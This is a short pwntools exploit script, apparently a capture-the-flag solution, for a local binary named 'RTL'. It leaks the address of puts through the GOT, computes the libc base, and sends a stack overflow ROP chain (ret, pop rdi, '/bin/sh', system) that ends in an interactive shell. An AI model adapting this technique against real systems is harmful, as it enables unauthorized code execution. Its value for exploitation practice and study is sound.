RTL

from pwn import *

context.log_level = 'debug'
r = process("./RTL")
e = ELF("./RTL")

r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")

puts_got = e.got['puts']
r.sendline(str(puts_got))

puts_offset = 0x80aa0
sys_offset = 0x4f550
r.recv()
libc_base = u64(r.recv(6) + "\\x00\\x00") - puts_offset

print (hex(libc_base))
sys = libc_base + sys_offset
binsh = libc_base + 0x1b3e1a
pop_rdi = 0x0000000000400933
ret = 0x0000000000400297

r.recvuntil(">")
r.sendline("2")

pay = "A" * 0x10
pay += "A" * 8
pay += p64(ret)
pay += p64(pop_rdi)
pay += p64(binsh)
pay += p64(sys)

r.sendline(pay)

r.interactive()